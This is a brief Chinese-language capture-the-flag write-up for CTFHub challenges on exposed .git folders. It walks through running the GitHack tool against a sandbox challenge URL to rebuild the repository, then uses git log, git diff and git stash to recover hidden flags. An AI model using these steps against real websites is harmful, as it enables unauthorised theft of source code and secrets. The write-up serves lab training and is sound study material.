Git泄露
当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。
log
利用工具-GitHack
git clone git://github.com/BugScanTeam/GitHack.git
进入GitHck文件夹,使用python2
python2 GitHack.py http://challenge-c1bea46c13604f27.sandbox.ctfhub.com:10800/.git/
还原后的文件在dist/目录下,进入
cd \dist\challenge-55b6c65232b6b6ab.sandbox.ctfhub.com_10080\
在这里检查git提交历史记录log,git log查看日志,可以看到add flag后又remove,所以检查当前版本与上一个版本的区别git diff 版本号
找到flag
Stash
-
git stash用于保存本地修改,将代码切换到head提交上
-
用githack扫描网址,进入产生的文件夹中,依次执行
git stash list //查看当前存储
git stash pop //恢复之前的工作目录
cat 147902533125205.txt//获得txt文件
//得到flag